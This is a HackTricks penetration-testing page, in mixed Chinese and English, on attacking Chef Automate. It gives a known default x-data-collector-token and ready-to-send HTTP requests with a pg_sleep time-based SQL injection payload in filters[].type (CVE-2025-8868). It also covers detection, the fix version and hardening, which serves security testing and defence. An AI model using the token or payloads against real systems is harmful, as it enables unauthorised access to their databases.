Chef Automate Enumeration & Attacks

Tip

学习并练习 AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
学习并练习 GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
学习并练习 Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

Overview

本页汇集了针对 Chef Automate 实例进行枚举和攻击的实用技术,重点包括:

  • 发现 gRPC-Gateway-backed REST endpoints 并通过 validation/error responses 推断请求 schema
  • 在存在默认值时滥用 x-data-collector-token 认证头
  • 在 Compliance API 中的 Time-based blind SQL injection(CVE-2025-8868),影响 /api/v0/compliance/profiles/search 中的 filters[].type 字段

Note: Backend responses that include header grpc-metadata-content-type: application/grpc typically indicate a gRPC-Gateway bridging REST calls to gRPC services.

Recon: Architecture and Fingerprints

  • Front-end: Often Angular。静态 bundle 可以提示 REST 路径(例如 /api/v0/…)
  • API transport: REST to gRPC via gRPC-Gateway
  • Responses may include grpc-metadata-content-type: application/grpc
  • Database/driver fingerprints:
  • Error bodies starting with pq: 强烈提示使用 PostgreSQL 和 Go pq driver
  • Interesting Compliance endpoints (auth required):
  • POST /api/v0/compliance/profiles/search
  • POST /api/v0/compliance/scanner/jobs/search

Auth: Data Collector Token (x-data-collector-token)

Chef Automate 暴露了一个 data collector,通过专用头对请求进行认证:

  • Header: x-data-collector-token
  • Risk: 某些环境可能保留默认 token,从而获得对受保护 API 路由的访问权限。已在野外观察到的已知默认值:
  • 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506

如果存在,该 token 可用于调用本应受 auth 限制的 Compliance API 端点。强化时务必尝试轮换/禁用默认值。

API Schema Inference via Error-Driven Discovery

gRPC-Gateway-backed 端点经常 leak 有用的 validation 错误,这些错误会描述期望的请求模型。

For /api/v0/compliance/profiles/search, the backend expects a body with a filters array, where each element is an object with:

  • type: string (filter field identifier)
  • values: array of strings

Example request shape:

{
"filters": [
{ "type": "name", "values": ["test"] }
]
}

格式错误的 JSON 或字段类型不正确通常会触发带有提示的 4xx/5xx 响应,且响应头会显示 gRPC-Gateway 的行为。使用这些信息映射字段并定位注入面。

合规 API SQL Injection (CVE-2025-8868)

  • 受影响的端点: POST /api/v0/compliance/profiles/search
  • 注入点: filters[].type
  • 漏洞类别: time-based blind SQL injection in PostgreSQL
  • 根本原因: 在将 type 字段插入到动态 SQL 片段(可能用于构建 identifiers/WHERE clauses)时,缺乏正确的 parameterization/whitelisting。type 中的构造值会被 PostgreSQL 评估。

有效的 time-based payload:

{"filters":[{"type":"name'||(SELECT pg_sleep(5))||'","values":["test"]}]}

技术说明:

  • 用单引号关闭原始字符串
  • 连接一个调用 pg_sleep(N) 的子查询
  • 通过 || 重新进入字符串上下文,以便无论 type 嵌入何处,最终的 SQL 都保持语法有效

通过差分延迟验证

发送成对请求并比较响应时间以验证服务器端执行:

  • N = 1 秒
POST /api/v0/compliance/profiles/search HTTP/1.1
Host: <target>
Content-Type: application/json
x-data-collector-token: 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506

{"filters":[{"type":"name'||(SELECT pg_sleep(1))||'","values":["test"]}]}
  • N = 5 秒
POST /api/v0/compliance/profiles/search HTTP/1.1
Host: <target>
Content-Type: application/json
x-data-collector-token: 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506

{"filters":[{"type":"name'||(SELECT pg_sleep(5))||'","values":["test"]}]}

Observed behavior:

  • Response times scale with pg_sleep(N)
  • HTTP 500 responses may include pq: details during probing, confirming SQL execution paths

Tip: 使用 timing validator(例如,多次试验并用统计比较)来减少噪声和误报。

Impact

Authenticated users—or unauthenticated actors abusing a default x-data-collector-token—can execute arbitrary SQL within Chef Automate’s PostgreSQL context, risking confidentiality and integrity of compliance profiles, configuration, and telemetry.

Affected versions / Fix

  • CVE: CVE-2025-8868
  • Upgrade guidance: Chef Automate 4.13.295 or later (Linux x86) per vendor advisories

Detection and Forensics

  • API layer:
  • Monitor 500s on /api/v0/compliance/profiles/search where filters[].type contains quotes (’), concatenation (||), or function references like pg_sleep
  • Inspect response headers for grpc-metadata-content-type to identify gRPC-Gateway flows
  • Database layer (PostgreSQL):
  • Audit for pg_sleep calls and malformed identifier errors (often surfaced with pq: prefixes coming from the Go pq driver)
  • Authentication:
  • Log and alert on usage of x-data-collector-token, especially known default values, across API paths

Mitigations and Hardening

  • Immediate:
  • Rotate/disable default data collector tokens
  • Restrict ingress to data collector endpoints; enforce strong, unique tokens
  • Code-level:
  • Parameterize queries; never string-concatenate SQL fragments
  • Strictly whitelist allowed type values on the server (enum)
  • Avoid dynamic SQL assembly for identifiers/clauses; if dynamic behavior is required, use safe identifier quoting and explicit whitelists

Practical Testing Checklist

  • Check if x-data-collector-token is accepted and whether the known default works
  • Map the Compliance API request schema by inducing validation errors and reading error messages/headers
  • Test for SQLi in less obvious “identifier-like” fields (e.g., filters[].type), not just values arrays or top-level text fields
  • Use time-based techniques with concatenation to keep SQL syntactically valid across contexts

References

Tip

学习并练习 AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
学习并练习 GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
学习并练习 Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks